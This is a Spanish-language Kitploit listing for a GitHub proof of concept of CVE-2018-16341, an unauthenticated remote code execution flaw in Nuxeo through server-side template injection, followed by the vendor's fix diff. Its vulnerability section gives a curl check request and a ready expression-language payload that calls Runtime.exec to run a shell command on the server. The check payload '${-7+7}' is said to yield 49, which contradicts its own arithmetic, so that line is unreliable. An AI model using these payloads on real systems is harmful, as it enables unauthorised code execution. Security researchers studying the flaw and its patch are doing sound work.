Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2018-16341 — CVE-2018-16341 - Ejecución remota de código en Nuxeo sin autenticación mediante inyección de plantillas del lado del servidor | Kitploit
Herramientas/GitHubGitHub/mpgn/cve-2018-16341
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubmpgn/cve-2018-16341

CVE-2018-16341

CVE-2018-16341 - Ejecución remota de código en Nuxeo sin autenticación mediante inyección de plantillas del lado del servidor

Ver Repositorio
2412hace 7 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2018-16341

Bypass de autenticación de Nuxeo y ejecución remota de código < 10.3 mediante un SSTI - CVE-2018-16341

image

Análisis detallado (no en inglés):

  • https://www.freebuf.com/vuls/193000.html
  • https://blog.riskivy.com/nuxeo-rce-analysis-cve-2018-16341/

Aviso de seguridad:

  • https://github.com/nuxeo/nuxeo/commit/eb54a9145c6d8297eba9d7dafc74556e735fa388#diff-cf2094833ef0eea473d03bf6559f1798R97

Nota: La versión 9.x de Nuxeo ya no es compatible con Nuxeo, pero se ha proporcionado un hotfix para la versión 9.x. En mi caso, la versión 9.10 era vulnerable.


La vulnerabilidad

Este PoC explota una inyección de plantillas del lado del servidor (SSTI) para lograr el RCE ubicado en el archivo NuxeoUnknownResource.java

  • Para comprobar si Nuxeo es vulnerable, simplemente envía este payload y busca el número 49:
root@kitploit:~
curl http://127.0.0.1:8080/nuxeo/login.jsp/pwn${-7+7}.xhtml"
  • Obtén el RCE usando este payload:
root@kitploit:~
${"".getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("touch /tmp/pwn.txt",null).waitFor()}

Solución

root@kitploit:~
@@ -94,8 +92,13 @@ public void connect() throws IOException {
 
             @Override
             public InputStream getInputStream() throws IOException {
+                String message = "ERROR: facelet not found";
+                // NXP-25746
+                if (Framework.isDevModeSet() && !path.contains("$") && !path.contains("#")) {
+                    message += " at '" + path + "'";
+                }
                 String msg = "<span><span style=\"color:red;font-weight:bold;\">"
-                        + StringEscapeUtils.escapeHtml4(errorMessage) + "</span><br/></span>";
+                        + StringEscapeUtils.escapeHtml4(message) + "</span><br/></span>";
                 return new ByteArrayInputStream(msg.getBytes());
             }
         }
Descargar herramienta